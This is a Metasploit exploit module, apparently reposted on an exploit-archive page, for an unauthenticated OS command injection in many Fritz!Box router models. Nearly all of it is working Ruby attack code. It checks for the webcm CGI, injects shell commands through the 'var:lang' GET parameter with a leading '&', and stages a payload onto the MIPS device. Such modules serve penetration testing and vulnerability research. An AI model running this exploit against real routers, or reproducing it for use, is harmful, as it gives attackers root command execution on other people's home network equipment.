Fritz!Box Webcm Unauthenticated Command Injection

2014-04-08 18:05:04

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho

def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'unknown', # Vulnerability discovery
'Fabian Braeunlein <[email protected]>', #Metasploit PoC with wget method
'Michael Messner <[email protected]>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], #vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], #probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], #published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
end

def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET'
})

if res && [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end

Exploit::CheckCode::Unknown
end

def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end

def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")

unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end

print_status("#{peer} - Exploiting...")

execute_cmdstager(
:linemax => 90
)
end
end

Fixes

No fixes

In order to submit a new fix you need to be registered.